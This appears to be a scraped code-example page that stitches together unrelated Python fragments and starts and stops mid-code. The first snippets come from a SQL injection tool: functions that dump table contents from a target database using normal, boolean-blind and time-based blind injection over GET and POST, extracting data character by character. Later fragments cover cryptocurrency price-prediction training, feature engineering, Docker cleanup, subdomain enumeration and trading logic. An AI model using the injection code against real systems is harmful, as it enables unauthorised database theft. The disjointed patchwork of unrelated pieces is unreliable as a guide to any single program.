            pub_p = int(value)
    logger.info('starting...')
    serv_forever(sub_p, pub_p)
Exemple #28
0
    def get_content(self, result, database_name, table_name, column_name,
                    limits):

        # 开始注内容
        content_len = 0
        logger.debug("Start sqli table %s column %s limit %d content..." %
                     (table_name, column_name, limits))

        # 先GET
        if self.sqlirequest == "GET":
            logger.debug("The sqlirequest is %s, start sqli content..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # 注这一条的数据长度
                logger.debug("Start %dth content length sqli..." %
                             (limits + 1))

                content_len = normal_injection(
                    select="length(" + column_name + ")",
                    source=database_name + "." + table_name,
                    limit=limits,
                    dealpayload=self.dealpayload,
                    data=self.Data,
                    isCount=True,
                    sqlirequest=self.sqlirequest)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # 然后注content
                logger.debug("Start %dth content sqli..." % (limits + 1))

                content = normal_injection(select=column_name,
                                           source=database_name + "." +
                                           table_name,
                                           limit=limits,
                                           dealpayload=self.dealpayload,
                                           data=self.Data,
                                           isStrings=True,
                                           sqlirequest=self.sqlirequest)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # 把content return回去,以元组的形式
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # 然后注content 的 length

                retVal = build_injection(select="length(" + column_name + ")",
                                         source=database_name + "." +
                                         table_name,
                                         limit=limits,
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                content_len = int(retVal)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # 然后注content名字
                # 清空column_name
                content = ""
                logger.debug("Start %dth content sqli..." % (limits + 1))

                for j in trange(int(content_len),
                                desc='%dth Content sqli' % (limits + 1),
                                leave=False):
                    retVal = build_injection(
                        select="ascii(substring(" + column_name + "," +
                        repr(j + 1) + ",1))",
                        source=database_name + "." + table_name,
                        limit=limits,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        lens=self.len,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)
                    content += chr(retVal)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # 把content return回去,以元组的形式
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # 然后注content 的length

                retVal = time_injection(select="length(" + column_name + ")",
                                        source=database_name + "." +
                                        table_name,
                                        limit=limits,
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                content_len = int(retVal)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # 然后注content名字
                # 清空column_name
                content = ""
                logger.debug("Start %dth content sqli..." % (limits + 1))

                for j in trange(int(content_len),
                                desc='%dth Database sqli' % (limits + 1),
                                leave=False):
                    retVal = time_injection(
                        select="ascii(substring(" + column_name + "," +
                        repr(j + 1) + ",1))",
                        source=database_name + "." + table_name,
                        limit=limits,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        times=self.time,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)
                    content += chr(retVal)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # 把content return回去,以元组的形式
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

        # 然后是post
        elif self.sqlirequest == "POST":
            logger.debug("The sqlirequest is %s, start sqli contents..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # 首先是tablename的长度

                content_len = normal_injection(
                    select="length(" + column_name + ")",
                    source=database_name + "." + table_name,
                    limit=limits,
                    dealpayload=self.dealpayload,
                    data=self.Data,
                    isCount=True,
                    sqlirequest=self.sqlirequest)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # 然后注content

                content = normal_injection(select=column_name,
                                           source=database_name + "." +
                                           table_name,
                                           limit=limits,
                                           dealpayload=self.dealpayload,
                                           data=self.Data,
                                           isStrings=True,
                                           sqlirequest=self.sqlirequest)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # 把content return回去,以元组的形式
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # 然后注content 的length
                retVal = build_injection(select="length(" + column_name + ")",
                                         source=database_name + "." +
                                         table_name,
                                         limit=limits,
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                content_len = int(retVal)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # 然后注content名字
                # 清空column_name
                content = ""
                logger.debug("Start %dth content sqli..." % (limits + 1))

                for j in trange(int(content_len),
                                desc='%dth Content sqli' % (limits + 1),
                                leave=False):
                    retVal = build_injection(
                        select="ascii(substring(" + column_name + "," +
                        repr(j + 1) + ",1))",
                        source=database_name + "." + table_name,
                        limit=limits,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        lens=self.len,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)
                    content += chr(retVal)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # 把content return回去,以元组的形式
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)

                # 然后注content 的length
                retVal = time_injection(select="length(" + column_name + ")",
                                        source=database_name + "." +
                                        table_name,
                                        limit=limits,
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                content_len = int(retVal)

                logger.debug(
                    "Content length sqli success...now is limit %d, The content_len is %d..."
                    % (limits, content_len))
                logger.info("[*] content_len: %d" % content_len)

                # 然后注content名字
                # 清空column_name
                content = ""
                logger.debug("Start %dth content sqli..." % (limits + 1))

                for j in trange(int(content_len),
                                desc='%dth Database sqli' % (limits + 1),
                                leave=False):
                    retVal = time_injection(
                        select="ascii(substring(" + column_name + "," +
                        repr(j + 1) + ",1))",
                        source=database_name + "." + table_name,
                        limit=limits,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        times=self.time,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)
                    content += chr(retVal)

                logger.debug("Content sqli success...The content is %s..." %
                             content)

                # 把content return回去,以元组的形式
                contents = [column_name, content]
                logger.info("[*] content: %s" % content)
                result.put(tuple(contents))

        logger.debug("Sqli table %s column %s limit %d success..." %
                     (table_name, column_name, limits))
Exemple #29
0
    def run_content(self):

        if len(self.columns_name) == 0:
            SqliColumns.get_columns(self)

        # 循环解包,进入注入
        for database_name in self.columns_name:
            for table_name in self.columns_name[database_name]:

                # 获取数据的条数,如果小于设置的self.content_count,那需要设置条数等于self.content_count
                content_counts = self.get_content_count(
                    database_name, table_name)
                if content_counts == 0:
                    logger.warning('Database %s Table %s is empty...' %
                                   (database_name, table_name))
                    continue
                elif content_counts != self.content_count:
                    logger.debug(
                        'Database %s Table %s content amount change to %d' %
                        (database_name, table_name, content_counts))
                    self.content_count = content_counts
                else:
                    pass

                # 声明一个表储存数据
                content = PrettyTable(
                    list(self.columns_name[database_name][table_name]))
                content.padding_width = 1
                content.align = "r"

                # 每个表都要注入指定条数那么多次
                for limits in xrange(self.content_count):

                    # 声明一个队列,储存返回的值
                    result = Queue.Queue()

                    # 声明线程队列、结果队列和最终插入table的数据队列
                    threads = []
                    results = []
                    contents = []

                    # 开始多线程的注入
                    logger.debug("Start multithreading Sqli...")
                    for column_name in self.columns_name[database_name][
                            table_name]:
                        # 开始一个线程注入一个字段
                        try:
                            t = threading.Thread(
                                target=self.get_content,
                                name='thread for %s' % column_name,
                                args=(result, database_name, table_name,
                                      column_name, limits))
                            t.start()
                        except ConnectionError:
                            logger.error('Thread error...')
                            pass

                        threads.append(t)

                    # 等待所有线程结束
                    for t in threads:
                        t.join()

                    # 注入处理返回数据,插入content中的一条
                    while not result.empty():
                        results.append(result.get())

                    # 处理返回的数据
                    for i in list(
                            self.columns_name[database_name][table_name]):
                        for item in results:
                            if item[0] == i:
                                contents.append(item[1])
                            else:
                                continue

                    # 插入数据
                    content_str = ','.join(contents)
                    logger.info("Sqli success content is %s" % content_str)
                    content.add_row(contents)

                # 输出表
                logger.debug("Database %s Table %s sqli success..." %
                             (database_name, table_name))
                print "[*] Database %s Table %s content:" % (database_name,
                                                             table_name)
                print content
def main():
    index = load_dataset('all_merged', return_index=True)
    for _sym, data in index.items():
        features, target = get_symbol_features(index, _sym)

        features_p = features[data['features']['ohlcv']].pct_change().replace(
            [np.inf, -np.inf], np.nan)
        features_p.columns = [c + '_p1' for c in features_p.columns]
        features_1 = features_p.shift(1)
        features_1.columns = [c + '_lag1' for c in features_1.columns]
        features_2 = features_p.shift(2)
        features_2.columns = [c + '_lag2' for c in features_2.columns]

        features_mean = features_p.rolling(3).mean()
        features_mean.columns = [c + '_mean_3' for c in features_mean.columns]

        ta = features[data['features']['ta'] + data['features']['ta_7d'] +
                      data['features']['ta_30d']]

        features = pd.concat([
            features['close'], ta, features_p, features_1, features_2,
            features_mean
        ],
                             axis=1)[30:]
        target = target[30:]
        # Split data in train and blind test set with 70:30 ratio,
        #  most ML models don't take sequentiality into account, but our pipeline
        #  uses a SimpleImputer with mean strategy, so it's best not to shuffle the data.
        X_train, X_test, y_train, y_test = train_test_split(features.values,
                                                            target.values,
                                                            shuffle=False,
                                                            test_size=0.3)
        logger.info("Start Feature Selection")
        imp = SimpleImputer()
        values = imp.fit_transform(X_train)
        #sel = SelectKBest(score_func=f_classif, k=min(10, X_train.shape[1]))
        feature_count = int(0.3 * X_train.shape[1])
        sel = RFECV(estimator=RandomForestClassifier(),
                    cv=5,
                    verbose=0,
                    n_jobs=4,
                    min_features_to_select=feature_count,
                    scoring='neg_mean_squared_error')
        sel.fit(values, y_train)
        logger.info("End Feature Selection")
        bestfeatures = [
            c for c, f in zip(features.columns, sel.get_support()) if f
        ]
        if not 'close' in bestfeatures:
            bestfeatures += ['close']
        print("Using features:\n{}".format(bestfeatures, len(bestfeatures)))

        train_features = pd.DataFrame(X_train, columns=features.columns)
        test_features = pd.DataFrame(X_test, columns=features.columns)
        X_train = train_features[bestfeatures].values
        X_test = test_features[bestfeatures].values

        # Summarize distribution
        print("Training set: # Features {}, # Samples {}".format(
            X_train.shape[1], X_train.shape[0]))
        plot_class_distribution("Training set", _sym, y_train)
        print("Test set: # Features {}, # Samples {}".format(
            X_test.shape[1], X_test.shape[0]))
        plot_class_distribution("Test set", _sym, y_test)
        if not np.isfinite(X_train).all():
            logger.warning("Training x is not finite!")
        if not np.isfinite(y_train).all():
            logger.warning("Training y is not finite!")
        if not np.isfinite(X_test).all():
            logger.warning("Test x is not finite!")
        if not np.isfinite(y_test).all():
            logger.warning("Test y is not finite!")

        # Build pipeline to be used as estimator in grid search
        #  so that each subset of the data is transformed independently
        #  to avoid contamination between folds.
        pipeline = Pipeline([
            (
                'i', IterativeImputer()
            ),  # Replace nan's with the median value between previous and next observation
            ('s', MinMaxScaler(feature_range=(-1, 1))),
            ('c', MLPClassifier()),
        ])

        # Perform hyperparameter tuning of the ensemble with 5-fold cross validation
        logger.info("Start Grid search")
        CV_rfc = GridSearchCV(estimator=pipeline,
                              param_grid=PARAM_GRID,
                              cv=5,
                              n_jobs=4,
                              scoring='neg_mean_squared_error',
                              verbose=1)
        CV_rfc.fit(X_train, y_train)
        logger.info("End Grid search")

        # Take the fitted ensemble with tuned hyperparameters
        clf = CV_rfc.best_estimator_
        # Test ensemble's performance on training and test sets
        logger.info("Classification report on train set")
        predictions1 = clf.predict(X_train)
        train_report = classification_report(y_train,
                                             predictions1,
                                             output_dict=True)
        print(classification_report(y_train, predictions1))
        logger.info("Classification report on test set")
        predictions2 = clf.predict(X_test)
        test_report = classification_report(y_test,
                                            predictions2,
                                            output_dict=True)
        print(classification_report(y_test, predictions2))
        stats = {
            'score': accuracy_score(y_train, predictions1),
            'mse': mean_squared_error(y_train, predictions1),
            'test_score': accuracy_score(y_test, predictions2),
            'test_mse': mean_squared_error(y_test, predictions2),
            'train_report': train_report,
            'test_report': test_report,
        }
        print(CV_rfc.best_params_)
        num_samples = min(y_train.shape[0], y_test.shape[0], 30)
        print("Gains calculated on {} samples only!".format(num_samples))
        print(
            "Train Accuracy: {}\nTrain MSE: {}\nGains on train preds: 100 -> {}"
            .format(
                accuracy_score(y_train, predictions1),
                mean_squared_error(y_train, predictions1),
                test_gains(train_features['close'][0:num_samples],
                           predictions1[0:num_samples],
                           initial_balance=100,
                           position_size=0.1)))
        print(
            "Test Accuracy: {}\nTest MSE: {}\nGains on test preds: 100 -> {}".
            format(
                accuracy_score(y_test, predictions2),
                mean_squared_error(y_test, predictions2),
                test_gains(test_features['close'][0:num_samples],
                           predictions2[0:num_samples],
                           initial_balance=100,
                           position_size=0.1)))
        print("--- end ---")
Exemple #31
0
def build(source_index, dest_index, W=10):
    _dataset = load_dataset(source_index, return_index=True)

    for _sym, entry in _dataset.items():
        _df = pd.read_csv(entry['csv'],
                          sep=',',
                          encoding='utf-8',
                          index_col='Date',
                          parse_dates=True)
        _target = pd.read_csv(entry['target_csv'],
                              sep=',',
                              encoding='utf-8',
                              index_col='Date',
                              parse_dates=True)
        ohlcv = _df[entry['features']['ohlcv']]

        ohlcv_d = {
            d: _df[entry['features']['ohlcv_{}d'.format(d)]]
            for d in [3, 7, 30]
        }
        ta_d = {
            d: _df[entry['features']['ta_{}d'.format(d)]]
            for d in [3, 7, 30]
        }

        ta = _df[entry['features']['ta']]
        cm = _df[entry['features']['cm']]

        cm_picked = pd.DataFrame(index=ohlcv.index)
        if 'adractcnt' in cm.columns:
            cm_picked['adractcnt_pct'] = cm.adractcnt.pct_change()
            # cm_picked['adractcnt_mean3_pct'] = cm.adractcnt.rolling(3).mean().pct_change()
            # cm_picked['adractcnt_mean7_pct'] = cm.adractcnt.rolling(7).mean().pct_change()
        # if 'splycur' in cm.columns: ## Correlated with volume and close
        #     cm_picked['vol_supply'] = ohlcv.volume / cm.splycur # Ratio between transacted volume and total supply (mined)
        if 'txtfrvaladjntv' in cm.columns and 'isstotntv' in cm.columns and 'feetotntv' in cm.columns:
            # I want to represent miners earnings (fees + issued coins) vs amount transacted in that interval
            cm_picked['earned_vs_transacted'] = (
                cm.isstotntv + cm.feetotntv) / cm.txtfrvaladjntv
        if 'isstotntv' in cm.columns:
            # isstotntv is total number of coins mined in the time interval
            # splycur is total number of coins mined (all time)
            total_mined = cm.isstotntv.rolling(
                365, min_periods=7).sum()  # total mined in a year
            cm_picked['isstot365_isstot1_pct'] = (cm.isstotntv /
                                                  total_mined).pct_change()
        if 'splycur' in cm.columns and 'isstotntv' in cm.columns:
            cm_picked['splycur_isstot1_pct'] = (cm.isstotntv /
                                                cm.splycur).pct_change()
        if 'hashrate' in cm.columns:
            #cm_picked['hashrate_mean3_pct'] = cm.hashrate.rolling(3).mean().pct_change()
            #cm_picked['hashrate_mean7_pct'] = cm.hashrate.rolling(7).mean().pct_change()
            cm_picked['hashrate_pct'] = cm.hashrate.pct_change()
        if 'roi30d' in cm.columns:
            cm_picked['roi30d'] = cm.roi30d
        if 'isstotntv' in cm.columns:
            cm_picked['isstotntv_pct'] = cm.isstotntv.pct_change()
        if 'feetotntv' in cm.columns:
            cm_picked['feetotntv_pct'] = cm.feetotntv.pct_change()
        if 'txtfrcount' in cm.columns:
            cm_picked['txtfrcount_pct'] = cm.txtfrcount.pct_change()
            #cm_picked['txtfrcount_volume'] = cm.txtfrcount.pct_change()
        if 'vtydayret30d' in cm.columns:
            cm_picked['vtydayret30d'] = cm.vtydayret30d
        if 'isscontpctann' in cm.columns:
            cm_picked['isscontpctann'] = cm.isscontpctann

        ta_picked = pd.DataFrame(index=ta.index)
        # REMA / RSMA are already used and well-estabilished in ATSA,
        # I'm taking the pct change since i want to encode the relative movement of the ema's not their positions
        # ta_picked['rema_5_20_pct'] = ta.rema_5_20.pct_change()
        ta_picked['rema_8_15_pct'] = ta.rema_8_15.pct_change()
        # ta_picked['rema_20_50_pct'] = ta.rema_20_50.pct_change()
        # ta_picked['rsma_5_20_pct'] = ta.rema_5_20.pct_change()
        ta_picked['rsma_8_15_pct'] = ta.rema_8_15.pct_change()
        # ta_picked['rsma_20_50_pct'] = ta.rema_20_50.pct_change()

        # Stoch is a momentum indicator comparing a particular closing price of a security to a range of its prices
        # over a certain period of time.
        # The sensitivity of the oscillator to market movements is reducible by adjusting that time period or
        # by taking a moving average of the result.
        # It is used to generate overbought and oversold trading signals, utilizing a 0-100 bounded range of values.
        # IDEA => decrease sensitivity by 3-mean and divide by 100 to get fp values
        ta_picked['stoch_14_mean3_div100'] = ta.stoch_14.rolling(
            3).mean() / 100

        #Moving Average Convergence Divergence (MACD) is a trend-following momentum indicator that shows
        # the relationship between two moving averages of a security’s price.
        # The MACD is calculated by subtracting the 26-period Exponential Moving Average (EMA) from the 12-period EMA.
        #  A nine-day EMA of the MACD called the "signal line," is then plotted on top of the MACD line,
        #  which can function as a trigger for buy and sell signals.
        #  Traders may buy the security when the MACD crosses above its signal line and sell - or short - the security
        #  when the MACD crosses below the signal line.
        #  Moving Average Convergence Divergence (MACD) indicators can be interpreted in several ways,
        #  but the more common methods are crossovers, divergences, and rapid rises/falls.
        signal_line = builder.exponential_moving_average(ta.macd_12_26, 9)
        ta_picked[
            'macd_12_26_signal'] = signal_line  # Relationship with signal line
        ta_picked['macd_12_26_diff_signal'] = (
            ta.macd_12_26 -
            signal_line).pct_change()  # Relationship with signal line
        ta_picked['macd_12_26_pct'] = ta.macd_12_26.pct_change(
        )  # Information about slope

        # PPO is identical to the moving average convergence divergence (MACD) indicator,
        # except the PPO measures percentage difference between two EMAs, while the MACD measures absolute (dollar) difference.
        signal_line = builder.exponential_moving_average(ta.ppo_12_26, 9)
        ta_picked[
            'ppo_12_26_signal'] = signal_line  # Relationship with signal line
        ta_picked['ppo_12_26_diff_signal'] = (
            ta.ppo_12_26 -
            signal_line).pct_change()  # Relationship with signal line
        ta_picked['ppo_12_26_pct'] = ta.ppo_12_26.pct_change(
        )  # Information about slope

        # ADI Accumulation/distribution is a cumulative indicator that uses volume and price to assess whether
        # a stock is being accumulated or distributed.
        # The accumulation/distribution measure seeks to identify divergences between the stock price and volume flow.
        # This provides insight into how strong a trend is. If the price is rising but the indicator is falling
        # this indicates that buying or accumulation volume may not be enough to support
        # the price rise and a price decline could be forthcoming.
        # ==> IDEA: if we can fit a line to the price y1 = m1X+q1 and a line to ADI y2=m2X+q2 then we can identify
        #           divergences by simply looking at the sign of M.
        #           Another insight would be given by the slope (ie pct_change)
        ta_picked['adi_pct'] = ta.adi.pct_change()
        ta_picked['adi_close_convergence'] = convergence_between_series(
            ta.adi, ohlcv.close, 3)

        # RSI goes from 0 to 100, values <= 20 mean BUY, while values >= 80 mean SELL.
        # Dividing it by 100 to get a floating point feature, makes no sense to pct_change it
        ta_picked['rsi_14_div100'] = ta.rsi_14 / 100

        # The Money Flow Index (MFI) is a technical indicator that generates overbought or oversold
        #   signals using both prices and volume data. The oscillator moves between 0 and 100.
        # An MFI reading above 80 is considered overbought and an MFI reading below 20 is considered oversold,
        #   although levels of 90 and 10 are also used as thresholds.
        # A divergence between the indicator and price is noteworthy. For example, if the indicator is rising while
        #   the price is falling or flat, the price could start rising.
        ta_picked['mfi_14_div100'] = ta.mfi_14 / 100

        # The Chande momentum oscillator is a technical momentum indicator similar to other momentum indicators
        #   such as Wilder’s Relative Strength Index (Wilder’s RSI) and the Stochastic Oscillator.
        #   It measures momentum on both up and down days and does not smooth results, triggering more frequent
        #   oversold and overbought penetrations. The indicator oscillates between +100 and -100.
        # Many technical traders add a 10-period moving average to this oscillator to act as a signal line.
        #   The oscillator generates a bullish signal when it crosses above the moving average and a
        #   bearish signal when it drops below the moving average.
        ta_picked['cmo_14_div100'] = ta.cmo_14 / 100
        signal_line = builder.simple_moving_average(ta.cmo_14, 10)
        ta_picked['cmo_14_signal'] = signal_line
        ta_picked['cmo_14_diff_signal'] = (ta.cmo_14 - signal_line) / 100

        # On-balance volume (OBV) is a technical trading momentum indicator that uses volume flow to predict changes in stock price.
        # Eventually, volume drives the price upward. At that point, larger investors begin to sell, and smaller investors begin buying.
        # Despite being plotted on a price chart and measured numerically,
        # the actual individual quantitative value of OBV is not relevant.
        # The indicator itself is cumulative, while the time interval remains fixed by a dedicated starting point,
        # meaning the real number value of OBV arbitrarily depends on the start date.
        # Instead, traders and analysts look to the nature of OBV movements over time;
        # the slope of the OBV line carries all of the weight of analysis. => We want percent change
        ta_picked['obv_pct'] = ta.obv.pct_change()
        ta_picked['obv_mean3_pct'] = ta.obv.rolling(3).mean().pct_change()

        # Strong rallies in price should see the force index rise.
        # During pullbacks and sideways movements, the force index will often fall because the volume
        # and/or the size of the price moves gets smaller.
        # => Encoding the percent variation could be a good idea
        ta_picked['fi_13_pct'] = ta.fi_13.pct_change()
        ta_picked['fi_50_pct'] = ta.fi_50.pct_change()

        # The Aroon Oscillator is a trend-following indicator that uses aspects of the
        # Aroon Indicator (Aroon Up and Aroon Down) to gauge the strength of a current trend
        # and the likelihood that it will continue.
        # It moves between -100 and 100. A high oscillator value is an indication of an uptrend
        # while a low oscillator value is an indication of a downtrend.
        ta_picked['ao_14'] = ta.ao_14 / 100

        # The average true range (ATR) is a technical analysis indicator that measures market volatility
        #   by decomposing the entire range of an asset price for that period.
        # ATRP is pct_change of volatility
        ta_picked['atrp_14'] = ta.atrp_14

        # Percentage Volume Oscillator (PVO) is momentum volume oscillator used in technical analysis
        #   to evaluate and measure volume surges and to compare trading volume to the average longer-term volume.
        # PVO does not analyze price and it is based solely on volume.
        #  It compares fast and slow volume moving averages by showing how short-term volume differs from
        #  the average volume over longer-term.
        #  Since it does not care a trend's factor in its calculation (only volume data are used)
        #  this technical indicator cannot be used alone to predict changes in a trend.
        ta_picked['pvo_12_26'] = ta.pvo_12_26

        # IGNORED: tsi, wd, adx,

        #lagged_stats = pd.concat([ohlcv_stats] + [builder.make_lagged(ohlcv_stats, i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner')

        # Build the dataframe with base features
        # lagged_close = pd.concat([ohlcv.close.pct_change()] + [builder.make_lagged(ohlcv.close.pct_change(), i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner')
        # lagged_close.columns = ['close_pct'] + ['close_pct_lag-{}'.format(i) for i in range(1, W +1)]

        ohlc = ohlcv[['open', 'high', 'low', 'close', 'volume']].pct_change()
        ohlc.columns = ['{}_pct'.format(c) for c in ohlcv.columns]
        lagged_ohlc_pct = pd.concat(
            [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)],
            axis='columns',
            verify_integrity=True,
            sort=True,
            join='inner')

        _time = pd.DataFrame(index=ohlcv.index)
        _time['day_of_year'] = ohlcv.index.dayofyear
        _time['day_of_week'] = ohlcv.index.dayofweek

        ohlc = ohlcv[['open', 'high', 'low', 'close', 'volume']]
        x_space = np.linspace(0, ohlc.index.size, ohlc.index.size)
        _splines = pd.DataFrame(index=ohlcv.index)

        # Highly correlated between themselves, no use
        # _splines['open_spl'] = get_spline(ohlc.open, 0)
        # _splines['high_spl'] = get_spline(ohlc.high, 0)
        # _splines['low_spl'] = get_spline(ohlc.low, 0)
        # _splines['close_spl'] = get_spline(ohlc.close, 0)

        _splines['open_spl_d1'] = builder.get_spline(ohlc.open, 1)
        _splines['high_spl_d1'] = builder.get_spline(ohlc.high, 1)
        _splines['low_spl_d1'] = builder.get_spline(ohlc.low, 1)
        _splines['close_spl_d1'] = builder.get_spline(ohlc.close, 1)

        _splines['open_spl_d2'] = builder.get_spline(ohlc.open, 2)
        _splines['high_spl_d2'] = builder.get_spline(ohlc.high, 2)
        _splines['low_spl_d2'] = builder.get_spline(ohlc.low, 2)
        _splines['close_spl_d2'] = builder.get_spline(ohlc.close, 2)

        _patterns = builder.get_talib_patterns(ohlcv)
        _new_features = pd.DataFrame(index=ohlcv.index)
        _new_features['candlestick_patterns_mean'] = _patterns.mean(axis=1)
        _new_features['candlestick_patterns_sum'] = _patterns.sum(axis=1)
        # WE LIKE THESE TWO!!!!
        _new_features['close_volatility_7d'] = ohlcv.close.pct_change(
        ).rolling(7).std(ddof=0)
        _new_features['close_volatility_30d'] = ohlcv.close.pct_change(
        ).rolling(30).std(ddof=0)
        #
        # Candle body size variation, for example
        _new_features['close_open_pct'] = (
            ohlcv.close - ohlcv.open
        ).pct_change()  # Change in body of the candle (> 0 if candle is green)
        _new_features['high_close_dist_pct'] = (
            ohlcv.high - ohlcv.close
        ).pct_change(
        )  # Change in wick size of the candle, shorter wick should be bullish
        _new_features['low_close_dist_pct'] = (
            ohlcv.close - ohlcv.low
        ).pct_change(
        )  # Change in shadow size of the candle, this increasing would indicate support (maybe a bounce)
        _new_features['high_low_dist_pct'] = (
            ohlcv.high - ohlcv.low
        ).pct_change(
        )  # Change in total candle size, smaller candles stands for low volatility

        for d in [3, 7, 30]:
            ohlcv_d[d].columns = ['close', 'high', 'low', 'open', 'volume']
            _new_features['close_open_pct_d{}'.format(d)] = (
                ohlcv_d[d].close - ohlcv_d[d].open).pct_change()
            _new_features['high_close_dist_pct_d{}'.format(d)] = (
                ohlcv_d[d].high - ohlcv_d[d].close).pct_change()
            _new_features['low_close_dist_pct_d{}'.format(d)] = (
                ohlcv_d[d].close - ohlcv_d[d].low).pct_change()
            _new_features['high_low_dist_pct_d{}'.format(d)] = (
                ohlcv_d[d].high - ohlcv_d[d].low).pct_change()

        _ta_windowed_features = pd.concat([
            v.rename(columns={c: '{}_ta{}d'.format(c, d)
                              for c in v.columns}) for d, v in ta_d.items()
        ],
                                          axis=1)
        # Add lagged features to the dataframe
        ta.columns = ['{}_ta1d'.format(c) for c in ta.columns]
        feature_groups = [
            _new_features, _splines, lagged_ohlc_pct, cm_picked, ta_picked,
            _ta_windowed_features, ta
        ]

        improved_df = pd.concat(feature_groups,
                                axis='columns',
                                verify_integrity=True,
                                sort=True,
                                join='inner')

        # Drop the first 30 rows
        improved_df = improved_df[30:]
        # Drop columns whose values are all nan or inf
        with pd.option_context('mode.use_inf_as_na',
                               True):  # Set option temporarily
            improved_df = improved_df.dropna(axis='columns', how='all')
        logger.info('Saving {}'.format(_sym))
        save_symbol_dataset(dest_index, _sym, improved_df, target=_target)
        logger.info('Saved {}'.format(_sym))
Exemple #32
0
 def stop_container(self, name=None, id=None):
     for c in self.containers.values():
         if (not name and not id) or id==c['Id'] or (name and name in c['Names']):
             self.client.kill(c['Id'])
             self.client.remove_container(c['Id'], force=True)
             L.info("Stopped container %(Name)s (%(Status)s)"%c)
 def run(self):
     domain_list = self.enumerate()
     for domain in domain_list:
         self.domain_name.append(domain)
     logger.info("{0} found {1} domains".format(self.engine_name, len(self.domain_name)))
     return self.domain_name,self.smiliar_domain_name,self.related_domain_name,self.email
Exemple #34
0
def trading_day(day, symbols, signals, order_size=0.1, history=None):
    if not signals.shape[0] and not signals.shape[1]:
        return
    session = DBSession()
    result = pd.DataFrame()
    exchange = Exchange(session)
    for s in symbols:
        # If there's no signal for this coin, close the position
        if not s in signals.columns:
            continue
        signal = signals['{}'.format(s)].iloc[0]
        close = signals['{}_close'.format(s)].iloc[0]
        label = signals['{}_label'.format(s)].iloc[0]

        if np.isnan(signal) or np.isnan(close):  # If signal is nan
            continue
        # if history is not None and not history.empty:
        #     signal_history = history['{}'.format(s)]
        #     close_history = history['{}_close'.format(s)]
        #     label_history = history['{}_label'.format(s)]
        # precision = precision_score(label_history.values, signal_history.values, average='micro', zero_division=True)
        # Fit an spline on available historical data, needs at least 7 days of activity
        #history_length = close_history.shape[0]
        #if history_length > 0:
        # Check last label is correct
        #check_signal(label_history.values[-1], close, close_history.values[-1])
        #--
        # hist = close_history.copy()
        # hist.loc[day] = close
        # pct = hist.pct_change().values[-1]
        # if history_length >= 7:
        #     x_space = np.linspace(0, history_length - 1, history_length)
        #     close_spline = UnivariateSpline(x_space, close_history.values, s=0, k=4)
        #     d1 = close_spline(history_length - 1, nu=1)
        #     d2 = close_spline(history_length - 1, nu=2)
        #     logger.info(
        #         "[Trading day: {}] {} | Signal: {} True: {} Precision: {} | Close: {} Pct: {} d1: {} d2: {}".format(
        #             day, s, signal, label, precision, close, pct, d1, d2
        #         ))
        # else:
        #     logger.info("[Trading day: {}] {} | Signal: {} True: {} Precision: {} | Close: {} Pct: {}".format(
        #         day, s, signal, label, precision, close, pct
        #     ))
        #signal = label
        # Grab balance for current symbol
        asset = exchange.get_or_create_asset(s, margin_fiat=10000, coins=0)
        #
        # Order management
        #
        # Manage LONG orders
        open_longs = exchange.get_open_long(asset)
        for o in open_longs:
            # If close meets stop loss, close position
            if o.should_stop(close):
                logger.info(
                    '[Day: {}] Closing long position {} on {} due to stop loss'
                    .format(day, o.id, o.symbol))
                exchange.close_order(day, asset, o, o.stop_loss)
                continue

            # If signal is SELL or position has a 1% profit
            if signal == SignalType.SELL:
